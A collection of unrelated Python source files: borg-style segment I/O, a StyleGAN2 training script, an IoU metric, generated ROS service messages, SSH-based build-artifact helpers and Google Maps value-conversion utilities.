self._write_fd.sync()
fd = self.get_fd(segment)
fd.seek(offset)
header = fd.read(self.put_header_fmt.size)
size, tag, key, data = self._read(fd, self.put_header_fmt, header, segment, offset, (TAG_PUT, ), read_data)
if id != key:
raise IntegrityError('Invalid segment entry header, is not for wanted id [segment {}, offset {}]'.format(
segment, offset))
return data if read_data else size
def _read(self, fd, fmt, header, segment, offset, acceptable_tags, read_data=True):
# some code shared by read() and iter_objects()
try:
hdr_tuple = fmt.unpack(header)
except struct.error as err:
raise IntegrityError('Invalid segment entry header [segment {}, offset {}]: {}'.format(
segment, offset, err)) from None
if fmt is self.put_header_fmt:
crc, size, tag, key = hdr_tuple
elif fmt is self.header_fmt:
crc, size, tag = hdr_tuple
key = None
else:
raise TypeError("_read called with unsupported format")
if size > MAX_OBJECT_SIZE:
# if you get this on an archive made with borg < 1.0.7 and millions of files and
# you need to restore it, you can disable this check by using "if False:" above.
raise IntegrityError('Invalid segment entry size {} - too big [segment {}, offset {}]'.format(
size, segment, offset))
if size < fmt.size:
raise IntegrityError('Invalid segment entry size {} - too small [segment {}, offset {}]'.format(
size, segment, offset))
length = size - fmt.size
if read_data:
data = fd.read(length)
if len(data) != length:
raise IntegrityError('Segment entry data short read [segment {}, offset {}]: expected {}, got {} bytes'.format(
segment, offset, length, len(data)))
if crc32(data, crc32(memoryview(header)[4:])) & 0xffffffff != crc:
raise IntegrityError('Segment entry checksum mismatch [segment {}, offset {}]'.format(
segment, offset))
if key is None and tag in (TAG_PUT, TAG_DELETE):
key, data = data[:32], data[32:]
else:
if key is None and tag in (TAG_PUT, TAG_DELETE):
key = fd.read(32)
length -= 32
if len(key) != 32:
raise IntegrityError('Segment entry key short read [segment {}, offset {}]: expected {}, got {} bytes'.format(
segment, offset, 32, len(key)))
oldpos = fd.tell()
seeked = fd.seek(length, os.SEEK_CUR) - oldpos
data = None
if seeked != length:
raise IntegrityError('Segment entry data short seek [segment {}, offset {}]: expected {}, got {} bytes'.format(
segment, offset, length, seeked))
if tag not in acceptable_tags:
raise IntegrityError('Invalid segment entry header, did not get acceptable tag [segment {}, offset {}]'.format(
segment, offset))
return size, tag, key, data
def write_put(self, id, data, raise_full=False):
data_size = len(data)
if data_size > MAX_DATA_SIZE:
# this would push the segment entry size beyond MAX_OBJECT_SIZE.
raise IntegrityError('More than allowed put data [{} > {}]'.format(data_size, MAX_DATA_SIZE))
fd = self.get_write_fd(raise_full=raise_full)
size = data_size + self.put_header_fmt.size
offset = self.offset
header = self.header_no_crc_fmt.pack(size, TAG_PUT)
crc = self.crc_fmt.pack(crc32(data, crc32(id, crc32(header))) & 0xffffffff)
fd.write(b''.join((crc, header, id, data)))
self.offset += size
return self.segment, offset
def write_delete(self, id, raise_full=False):
fd = self.get_write_fd(raise_full=raise_full)
header = self.header_no_crc_fmt.pack(self.put_header_fmt.size, TAG_DELETE)
crc = self.crc_fmt.pack(crc32(id, crc32(header)) & 0xffffffff)
fd.write(b''.join((crc, header, id)))
self.offset += self.put_header_fmt.size
return self.segment, self.put_header_fmt.size
def write_commit(self, intermediate=False):
if intermediate:
# Intermediate commits go directly into the current segment - this makes checking their validity more
# expensive, but is faster and reduces clobber.
fd = self.get_write_fd()
fd.sync()
else:
self.close_segment()
fd = self.get_write_fd()
header = self.header_no_crc_fmt.pack(self.header_fmt.size, TAG_COMMIT)
crc = self.crc_fmt.pack(crc32(header) & 0xffffffff)
fd.write(b''.join((crc, header)))
self.close_segment()
return self.segment - 1 # close_segment() increments it
assert LoggedIO.put_header_fmt.size == 41 # see constants.MAX_OBJECT_SIZE
|
py | 7dfa9448c914138c6d8b7efc4f5b89975b3dbdbc | """
---
title: StyleGAN 2 Model Training
summary: >
An annotated PyTorch implementation of StyleGAN2 model training code.
---
# [StyleGAN 2](index.html) Model Training
This is the training code for the [StyleGAN 2](index.html) model.

---*These are $64 \times 64$ images generated after training for about 80K steps.*---
*Our implementation is a minimalistic StyleGAN 2 model training code.
Only single GPU training is supported to keep the implementation simple.
We managed to shrink it to keep it at less than 500 lines of code, including the training loop.*
*Without DDP (distributed data parallel) and multi-gpu training it will not be possible to train the model
for large resolutions (128+).
If you want training code with fp16 and DDP take a look at
[lucidrains/stylegan2-pytorch](https://github.com/lucidrains/stylegan2-pytorch).*
We trained this on [CelebA-HQ dataset](https://github.com/tkarras/progressive_growing_of_gans).
You can find the download instruction in this
[discussion on fast.ai](https://forums.fast.ai/t/download-celeba-hq-dataset/45873/3).
Save the images inside [`data/stylegan` folder](#dataset_path).
"""
import math
from pathlib import Path
from typing import Iterator, Tuple
import torch
import torch.utils.data
import torchvision
from PIL import Image
from labml import tracker, lab, monit, experiment
from labml.configs import BaseConfigs
from labml_helpers.device import DeviceConfigs
from labml_helpers.train_valid import ModeState, hook_model_outputs
from labml_nn.gan.stylegan import Discriminator, Generator, MappingNetwork, GradientPenalty, PathLengthPenalty
from labml_nn.gan.wasserstein import DiscriminatorLoss, GeneratorLoss
from labml_nn.utils import cycle_dataloader
class Dataset(torch.utils.data.Dataset):
"""
## Dataset
This loads the training dataset and resizes it to the given image size.
"""
def __init__(self, path: str, image_size: int):
"""
* `path` path to the folder containing the images
* `image_size` size of the image
"""
super().__init__()
# Get the paths of all `jpg` files
self.paths = [p for p in Path(path).glob(f'**/*.jpg')]
# Transformation
self.transform = torchvision.transforms.Compose([
# Resize the image
torchvision.transforms.Resize(image_size),
# Convert to PyTorch tensor
torchvision.transforms.ToTensor(),
])
def __len__(self):
"""Number of images"""
return len(self.paths)
def __getitem__(self, index):
"""Get the the `index`-th image"""
path = self.paths[index]
img = Image.open(path)
return self.transform(img)
class Configs(BaseConfigs):
"""
## Configurations
"""
# Device to train the model on.
# [`DeviceConfigs`](https://docs.labml.ai/api/helpers.html#labml_helpers.device.DeviceConfigs)
# picks up an available CUDA device or defaults to CPU.
device: torch.device = DeviceConfigs()
# [StyleGAN2 Discriminator](index.html#discriminator)
discriminator: Discriminator
# [StyleGAN2 Generator](index.html#generator)
generator: Generator
# [Mapping network](index.html#mapping_network)
mapping_network: MappingNetwork
# Discriminator and generator loss functions.
# We use [Wasserstein loss](../wasserstein/index.html)
discriminator_loss: DiscriminatorLoss
generator_loss: GeneratorLoss
# Optimizers
generator_optimizer: torch.optim.Adam
discriminator_optimizer: torch.optim.Adam
mapping_network_optimizer: torch.optim.Adam
# [Gradient Penalty Regularization Loss](index.html#gradient_penalty)
gradient_penalty = GradientPenalty()
# Gradient penalty coefficient $\gamma$
gradient_penalty_coefficient: float = 10.
# [Path length penalty](index.html#path_length_penalty)
path_length_penalty: PathLengthPenalty
# Data loader
loader: Iterator
# Batch size
batch_size: int = 32
# Dimensionality of $z$ and $w$
d_latent: int = 512
# Height/width of the image
image_size: int = 32
# Number of layers in the mapping network
mapping_network_layers: int = 8
# Generator & Discriminator learning rate
learning_rate: float = 1e-3
# Mapping network learning rate ($100 \times$ lower than the others)
mapping_network_learning_rate: float = 1e-5
# Number of steps to accumulate gradients on. Use this to increase the effective batch size.
gradient_accumulate_steps: int = 1
# $\beta_1$ and $\beta_2$ for Adam optimizer
adam_betas: Tuple[float, float] = (0.0, 0.99)
# Probability of mixing styles
style_mixing_prob: float = 0.9
# Total number of training steps
training_steps: int = 150_000
# Number of blocks in the generator (calculated based on image resolution)
n_gen_blocks: int
# ### Lazy regularization
# Instead of calculating the regularization losses, the paper proposes lazy regularization
# where the regularization terms are calculated once in a while.
# This improves the training efficiency a lot.
# The interval at which to compute gradient penalty
lazy_gradient_penalty_interval: int = 4
# Path length penalty calculation interval
lazy_path_penalty_interval: int = 32
# Skip calculating path length penalty during the initial phase of training
lazy_path_penalty_after: int = 5_000
# How often to log generated images
log_generated_interval: int = 500
# How often to save model checkpoints
save_checkpoint_interval: int = 2_000
# Training mode state for logging activations
mode: ModeState
# Whether to log model layer outputs
log_layer_outputs: bool = False
# <a id="dataset_path"></a>
# We trained this on [CelebA-HQ dataset](https://github.com/tkarras/progressive_growing_of_gans).
# You can find the download instruction in this
# [discussion on fast.ai](https://forums.fast.ai/t/download-celeba-hq-dataset/45873/3).
# Save the images inside `data/stylegan` folder.
dataset_path: str = str(lab.get_data_path() / 'stylegan2')
def init(self):
"""
### Initialize
"""
# Create dataset
dataset = Dataset(self.dataset_path, self.image_size)
# Create data loader
dataloader = torch.utils.data.DataLoader(dataset, batch_size=self.batch_size, num_workers=8,
shuffle=True, drop_last=True, pin_memory=True)
# Continuous [cyclic loader](../../utils.html#cycle_dataloader)
self.loader = cycle_dataloader(dataloader)
# $\log_2$ of image resolution
log_resolution = int(math.log2(self.image_size))
# Create discriminator and generator
self.discriminator = Discriminator(log_resolution).to(self.device)
self.generator = Generator(log_resolution, self.d_latent).to(self.device)
# Get number of generator blocks for creating style and noise inputs
self.n_gen_blocks = self.generator.n_blocks
# Create mapping network
self.mapping_network = MappingNetwork(self.d_latent, self.mapping_network_layers).to(self.device)
# Create path length penalty loss
self.path_length_penalty = PathLengthPenalty(0.99).to(self.device)
# Add model hooks to monitor layer outputs
if self.log_layer_outputs:
hook_model_outputs(self.mode, self.discriminator, 'discriminator')
hook_model_outputs(self.mode, self.generator, 'generator')
hook_model_outputs(self.mode, self.mapping_network, 'mapping_network')
# Discriminator and generator losses
self.discriminator_loss = DiscriminatorLoss().to(self.device)
self.generator_loss = GeneratorLoss().to(self.device)
# Create optimizers
self.discriminator_optimizer = torch.optim.Adam(
self.discriminator.parameters(),
lr=self.learning_rate, betas=self.adam_betas
)
self.generator_optimizer = torch.optim.Adam(
self.generator.parameters(),
lr=self.learning_rate, betas=self.adam_betas
)
self.mapping_network_optimizer = torch.optim.Adam(
self.mapping_network.parameters(),
lr=self.mapping_network_learning_rate, betas=self.adam_betas
)
# Set tracker configurations
tracker.set_image("generated", True)
def get_w(self, batch_size: int):
"""
### Sample $w$
This samples $z$ randomly and gets $w$ from the mapping network.
We also apply style mixing sometimes where we generate two latent variables
$z_1$ and $z_2$ and get corresponding $w_1$ and $w_2$.
Then we randomly sample a cross-over point and apply $w_1$ to
the generator blocks before the cross-over point and
$w_2$ to the blocks after.
"""
# Mix styles
if torch.rand(()).item() < self.style_mixing_prob:
# Random cross-over point
cross_over_point = int(torch.rand(()).item() * self.n_gen_blocks)
# Sample $z_1$ and $z_2$
z2 = torch.randn(batch_size, self.d_latent).to(self.device)
z1 = torch.randn(batch_size, self.d_latent).to(self.device)
# Get $w_1$ and $w_2$
w1 = self.mapping_network(z1)
w2 = self.mapping_network(z2)
# Expand $w_1$ and $w_2$ for the generator blocks and concatenate
w1 = w1[None, :, :].expand(cross_over_point, -1, -1)
w2 = w2[None, :, :].expand(self.n_gen_blocks - cross_over_point, -1, -1)
return torch.cat((w1, w2), dim=0)
# Without mixing
else:
# Sample $z$
z = torch.randn(batch_size, self.d_latent).to(self.device)
# Get $w$ from the mapping network
w = self.mapping_network(z)
# Expand $w$ for the generator blocks
return w[None, :, :].expand(self.n_gen_blocks, -1, -1)
def get_noise(self, batch_size: int):
"""
### Generate noise
This generates noise for each [generator block](index.html#generator_block)
"""
# List to store noise
noise = []
# Noise resolution starts from $4$
resolution = 4
# Generate noise for each generator block
for i in range(self.n_gen_blocks):
# The first block has only one $3 \times 3$ convolution
if i == 0:
n1 = None
# Generate noise to add after the first convolution layer
else:
n1 = torch.randn(batch_size, 1, resolution, resolution, device=self.device)
# Generate noise to add after the second convolution layer
n2 = torch.randn(batch_size, 1, resolution, resolution, device=self.device)
# Add noise tensors to the list
noise.append((n1, n2))
# Next block has $2 \times$ resolution
resolution *= 2
# Return noise tensors
return noise
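# For example, with `n_gen_blocks = 5` the returned list covers resolutions 4, 8, 16, 32 and 64:
# [(None, n@4x4), (n@8x8, n@8x8), ..., (n@64x64, n@64x64)], where each `n` has shape
# `(batch_size, 1, resolution, resolution)` and the first block gets no `n1` noise.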
def generate_images(self, batch_size: int):
"""
### Generate images
This generates images using the generator.
"""
# Get $w$
w = self.get_w(batch_size)
# Get noise
noise = self.get_noise(batch_size)
# Generate images
images = self.generator(w, noise)
# Return images and $w$
return images, w
def step(self, idx: int):
"""
### Training Step
"""
# Train the discriminator
with monit.section('Discriminator'):
# Reset gradients
self.discriminator_optimizer.zero_grad()
# Accumulate gradients for `gradient_accumulate_steps`
for i in range(self.gradient_accumulate_steps):
# Update `mode`. Set whether to log activation
with self.mode.update(is_log_activations=(idx + 1) % self.log_generated_interval == 0):
# Sample images from generator
generated_images, _ = self.generate_images(self.batch_size)
# Discriminator classification for generated images
fake_output = self.discriminator(generated_images.detach())
# Get real images from the data loader
real_images = next(self.loader).to(self.device)
# We need to calculate gradients w.r.t. real images for gradient penalty
if (idx + 1) % self.lazy_gradient_penalty_interval == 0:
real_images.requires_grad_()
# Discriminator classification for real images
real_output = self.discriminator(real_images)
# Get discriminator loss
real_loss, fake_loss = self.discriminator_loss(real_output, fake_output)
disc_loss = real_loss + fake_loss
# Add gradient penalty
if (idx + 1) % self.lazy_gradient_penalty_interval == 0:
# Calculate and log gradient penalty
gp = self.gradient_penalty(real_images, real_output)
tracker.add('loss.gp', gp)
# Multiply by the coefficient and add the gradient penalty; it is scaled by the lazy interval
# to compensate for being computed only once every `lazy_gradient_penalty_interval` steps
disc_loss = disc_loss + 0.5 * self.gradient_penalty_coefficient * gp * self.lazy_gradient_penalty_interval
# Compute gradients
disc_loss.backward()
# Log discriminator loss
tracker.add('loss.discriminator', disc_loss)
if (idx + 1) % self.log_generated_interval == 0:
# Log discriminator model parameters occasionally
tracker.add('discriminator', self.discriminator)
# Clip gradients for stabilization
torch.nn.utils.clip_grad_norm_(self.discriminator.parameters(), max_norm=1.0)
# Take optimizer step
self.discriminator_optimizer.step()
# Train the generator
with monit.section('Generator'):
# Reset gradients
self.generator_optimizer.zero_grad()
self.mapping_network_optimizer.zero_grad()
# Accumulate gradients for `gradient_accumulate_steps`
for i in range(self.gradient_accumulate_steps):
# Sample images from generator
generated_images, w = self.generate_images(self.batch_size)
# Discriminator classification for generated images
fake_output = self.discriminator(generated_images)
# Get generator loss
gen_loss = self.generator_loss(fake_output)
# Add path length penalty
if idx > self.lazy_path_penalty_after and (idx + 1) % self.lazy_path_penalty_interval == 0:
# Calculate path length penalty
plp = self.path_length_penalty(w, generated_images)
# Ignore if `nan`
if not torch.isnan(plp):
tracker.add('loss.plp', plp)
gen_loss = gen_loss + plp
# Calculate gradients
gen_loss.backward()
# Log generator loss
tracker.add('loss.generator', gen_loss)
if (idx + 1) % self.log_generated_interval == 0:
# Log generator and mapping network parameters occasionally
tracker.add('generator', self.generator)
tracker.add('mapping_network', self.mapping_network)
# Clip gradients for stabilization
torch.nn.utils.clip_grad_norm_(self.generator.parameters(), max_norm=1.0)
torch.nn.utils.clip_grad_norm_(self.mapping_network.parameters(), max_norm=1.0)
# Take optimizer step
self.generator_optimizer.step()
self.mapping_network_optimizer.step()
# Log generated images
if (idx + 1) % self.log_generated_interval == 0:
tracker.add('generated', torch.cat([generated_images[:6], real_images[:3]], dim=0))
# Save model checkpoints
if (idx + 1) % self.save_checkpoint_interval == 0:
experiment.save_checkpoint()
# Flush tracker
tracker.save()
def train(self):
"""
## Train model
"""
# Loop for `training_steps`
for i in monit.loop(self.training_steps):
# Take a training step
self.step(i)
#
if (i + 1) % self.log_generated_interval == 0:
tracker.new_line()
def main():
"""
### Train StyleGAN2
"""
# Create an experiment
experiment.create(name='stylegan2')
# Create configurations object
configs = Configs()
# Set configurations and override some
experiment.configs(configs, {
'device.cuda_device': 0,
'image_size': 64,
'log_generated_interval': 200
})
# Initialize
configs.init()
# Set models for saving and loading
experiment.add_pytorch_models(mapping_network=configs.mapping_network,
generator=configs.generator,
discriminator=configs.discriminator)
# Start the experiment
with experiment.start():
# Run the training loop
configs.train()
#
if __name__ == '__main__':
main()
|
py | 7dfa954689a3a78bcaed66f8704f4118bdced662 | counter_name = 'S:SRcurrentAI.VAL'
Size = wx.Size(667, 473)
logfile = '//id14bxf/data/anfinrud_1106/Logfiles/test.log'
average_count = 10
max_value = nan
min_value = nan
start_fraction = 0
reject_outliers = False
outlier_cutoff = 2.5
show_statistics = False
time_window = 30
|
py | 7dfa95e2a9544b56bc44994ad307dd6e4dc424f4 | from typing import Optional, Union
import numpy as np
import torch
def compute_iou(
pred_mask: Union[np.ndarray, torch.Tensor],
gt_mask: Union[np.ndarray, torch.Tensor],
threshold: Optional[float] = 0.5,
eps: float = 1e-7
) -> Union[np.ndarray, torch.Tensor]:
"""
:param pred_mask: (B x H x W) or (H x W)
:param gt_mask: (B x H x W) or (H x W), same shape with pred_mask
:param threshold: a binarization threshold
:param eps: a small value for computational stability
:return: (B) or (1)
"""
assert pred_mask.shape == gt_mask.shape, f"{pred_mask.shape} != {gt_mask.shape}"
# assert 0. <= pred_mask.to(torch.float32).min() and pred_mask.max().to(torch.float32) <= 1., f"{pred_mask.min(), pred_mask.max()}"
if threshold is not None:
pred_mask = pred_mask > threshold
if isinstance(pred_mask, np.ndarray):
intersection = np.logical_and(pred_mask, gt_mask).sum(axis=(-1, -2))
union = np.logical_or(pred_mask, gt_mask).sum(axis=(-1, -2))
ious = (intersection / (union + eps))
else:
intersection = torch.logical_and(pred_mask, gt_mask).sum(dim=(-1, -2))
union = torch.logical_or(pred_mask, gt_mask).sum(dim=(-1, -2))
ious = (intersection / (union + eps)).cpu()
return ious |
py | 7dfa96035d45cbc1d573c62425296e7dbdb38146 | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from test/receiver_get_emitter_directionRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class receiver_get_emitter_directionRequest(genpy.Message):
_md5sum = "f9df5232b65af94f73f79fe6d84301bb"
_type = "test/receiver_get_emitter_directionRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """uint8 ask
"""
__slots__ = ['ask']
_slot_types = ['uint8']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommended
use is keyword arguments, as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
ask
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(receiver_get_emitter_directionRequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.ask is None:
self.ask = 0
else:
self.ask = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
buff.write(_get_struct_B().pack(self.ask))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
start = end
end += 1
(self.ask,) = _get_struct_B().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
buff.write(_get_struct_B().pack(self.ask))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
start = end
end += 1
(self.ask,) = _get_struct_B().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_B = None
def _get_struct_B():
global _struct_B
if _struct_B is None:
_struct_B = struct.Struct("<B")
return _struct_B
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from test/receiver_get_emitter_directionResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class receiver_get_emitter_directionResponse(genpy.Message):
_md5sum = "3f61a8da1ee4e83406fd5157b36d50cb"
_type = "test/receiver_get_emitter_directionResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """float64[] direction
"""
__slots__ = ['direction']
_slot_types = ['float64[]']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommended
use is keyword arguments, as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
direction
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(receiver_get_emitter_directionResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.direction is None:
self.direction = []
else:
self.direction = []
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
length = len(self.direction)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *self.direction))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.direction = struct.unpack(pattern, str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
length = len(self.direction)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.direction.tostring())
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.direction = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
class receiver_get_emitter_direction(object):
_type = 'test/receiver_get_emitter_direction'
_md5sum = 'cad5a90bedce22b568c949b40e9cc6e0'
_request_class = receiver_get_emitter_directionRequest
_response_class = receiver_get_emitter_directionResponse
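# Hypothetical client-side usage of this autogenerated service definition (the service name and
# values below are illustrative and require a running rospy node):
#   rospy.wait_for_service('receiver_get_emitter_direction')
#   get_direction = rospy.ServiceProxy('receiver_get_emitter_direction', receiver_get_emitter_direction)
#   response = get_direction(ask=1)   # response.direction is a sequence of float64 values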
|
py | 7dfa9773a8f0247399141338adb00bd0fa12428e | """
This file contains utility functions for scripts responsible for pushing
and pulling build artifacts.
"""
__author__ = "Jakub Kudzia"
__copyright__ = "Copyright (C) 2016 ACK CYFRONET AGH"
__license__ = "This software is released under the MIT license cited in " \
"LICENSE.txt"
import os
import time
ARTIFACTS_DIR = 'artifacts'
ARTIFACTS_EXT = '.tar.gz'
PARTIAL_EXT = '.partial'
DEFAULT_BRANCH = 'develop'
def lock_file(ssh, file_name):
"""
Set lock on file_name via ssh. Hangs if file_name is currently locked.
:param ssh: sshclient with opened connection
:type ssh: paramiko.SSHClient
:param file_name: name of file to be locked
:type file_name: str
:return None
"""
_, stdout, _ = ssh.exec_command("lockfile {}.lock".format(file_name),
get_pty=True)
while not stdout.channel.exit_status_ready():
# ssh.exec_command is asynchronous therefore we must wait till command
# exit status is ready
time.sleep(1)
def unlock_file(ssh, file_name):
"""
Delete lock on file_name via ssh.
:param ssh: sshclient with opened connection
:type ssh: paramiko.SSHClient
:param file_name: name of file to be unlocked
:type file_name: str
:return None
"""
delete_file(ssh, "{}.lock".format(file_name))
def artifact_path(plan, branch):
"""
Returns path to artifact for specific plan and branch. Path is relative
to user's home directory on repository machine.
:param plan: name of current bamboo plan
:type plan: str
:param branch: name of current git branch
:type branch: str
"""
return os.path.join(ARTIFACTS_DIR, plan, branch + ARTIFACTS_EXT)
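# For example (hypothetical plan name): artifact_path('my_plan', DEFAULT_BRANCH)
# returns 'artifacts/my_plan/develop.tar.gz'.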
def delete_file(ssh, file_name):
"""
Delete file named file_name via ssh.
:param ssh: sshclient with opened connection
:type ssh: paramiko.SSHClient
:param file_name: name of file to be deleted
:type file_name: str
:return None
"""
ssh.exec_command("rm -rf {}".format(file_name))
|
py | 7dfa9882df0d908823e243b9a754c7d3281a6d80 | #
# Copyright 2014 Google Inc. All rights reserved.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
"""Converts Python types to string representations suitable for Maps API server.
For example:
sydney = {
"lat" : -33.8674869,
"lng" : 151.2069902
}
convert.latlng(sydney)
# '-33.8674869,151.2069902'
"""
def format_float(arg):
"""Formats a float value to be as short as possible.
Truncates float to 8 decimal places and trims extraneous
trailing zeros and period to give API args the best
possible chance of fitting within 2000 char URL length
restrictions.
For example:
format_float(40) -> "40"
format_float(40.0) -> "40"
format_float(40.1) -> "40.1"
format_float(40.001) -> "40.001"
format_float(40.0010) -> "40.001"
format_float(40.000000001) -> "40"
format_float(40.000000009) -> "40.00000001"
:param arg: The lat or lng float.
:type arg: float
:rtype: string
"""
return ("%.8f" % float(arg)).rstrip("0").rstrip(".")
def latlng(arg):
"""Converts a lat/lon pair to a comma-separated string.
For example:
sydney = {
"lat" : -33.8674869,
"lng" : 151.2069902
}
convert.latlng(sydney)
# '-33.8674869,151.2069902'
For convenience, also accepts lat/lon pair as a string, in
which case it's returned unchanged.
:param arg: The lat/lon pair.
:type arg: string or dict or list or tuple
"""
if is_string(arg):
return arg
normalized = normalize_lat_lng(arg)
return "%s,%s" % (format_float(normalized[0]), format_float(normalized[1]))
def normalize_lat_lng(arg):
"""Take the various lat/lng representations and return a tuple.
Accepts various representations:
1) dict with two entries - "lat" and "lng"
2) list or tuple - e.g. (-33, 151) or [-33, 151]
:param arg: The lat/lng pair.
:type arg: dict or list or tuple
:rtype: tuple (lat, lng)
"""
if isinstance(arg, dict):
if "lat" in arg and "lng" in arg:
return arg["lat"], arg["lng"]
if "latitude" in arg and "longitude" in arg:
return arg["latitude"], arg["longitude"]
# List or tuple.
if _is_list(arg):
return arg[0], arg[1]
raise TypeError(
"Expected a lat/lng dict or tuple, "
"but got %s" % type(arg).__name__)
def location_list(arg):
"""Joins a list of locations into a pipe separated string, handling
the various formats supported for lat/lng values.
For example:
p = [{"lat" : -33.867486, "lng" : 151.206990}, "Sydney"]
convert.waypoint(p)
# '-33.867486,151.206990|Sydney'
:param arg: The lat/lng list.
:type arg: list
:rtype: string
"""
if isinstance(arg, tuple):
# Handle the single-tuple lat/lng case.
return latlng(arg)
else:
return "|".join([latlng(location) for location in as_list(arg)])
def join_list(sep, arg):
"""If arg is list-like, then joins it with sep.
:param sep: Separator string.
:type sep: string
:param arg: Value to coerce into a list.
:type arg: string or list of strings
:rtype: string
"""
return sep.join(as_list(arg))
def as_list(arg):
"""Coerces arg into a list. If arg is already list-like, returns arg.
Otherwise, returns a one-element list containing arg.
:rtype: list
"""
if _is_list(arg):
return arg
return [arg]
def _is_list(arg):
"""Checks if arg is list-like. This excludes strings and dicts."""
if isinstance(arg, dict):
return False
if isinstance(arg, str): # Python 3-only, as str has __iter__
return False
return (not _has_method(arg, "strip")
and _has_method(arg, "__getitem__")
or _has_method(arg, "__iter__"))
def is_string(val):
"""Determines whether the passed value is a string, safe for 2/3."""
try:
basestring
except NameError:
return isinstance(val, str)
return isinstance(val, basestring)
def time(arg):
"""Converts the value into a unix time (seconds since unix epoch).
For example:
convert.time(datetime.now())
# '1409810596'
:param arg: The time.
:type arg: datetime.datetime or int
"""
# handle datetime instances.
if _has_method(arg, "timestamp"):
arg = arg.timestamp()
if isinstance(arg, float):
arg = int(arg)
return str(arg)
def _has_method(arg, method):
"""Returns true if the given object has a method with the given name.
:param arg: the object
:param method: the method name
:type method: string
:rtype: bool
"""
return hasattr(arg, method) and callable(getattr(arg, method))
def components(arg):
"""Converts a dict of components to the format expected by the Google Maps
server.
For example:
c = {"country": "US", "postal_code": "94043"}
convert.components(c)
# 'country:US|postal_code:94043'
:param arg: The component filter.
:type arg: dict
:rtype: basestring
"""
# Components may have multiple values per type, here we
# expand them into individual key/value items, eg:
# {"country": ["US", "AU"], "foo": 1} -> "country:AU", "country:US", "foo:1"
def expand(arg):
for k, v in arg.items():
for item in as_list(v):
yield "%s:%s" % (k, item)
if isinstance(arg, dict):
return "|".join(sorted(expand(arg)))
raise TypeError(
"Expected a dict for components, "
"but got %s" % type(arg).__name__)
def bounds(arg):
"""Converts a lat/lon bounds to a comma- and pipe-separated string.
Accepts two representations:
1) string: pipe-separated pair of comma-separated lat/lon pairs.
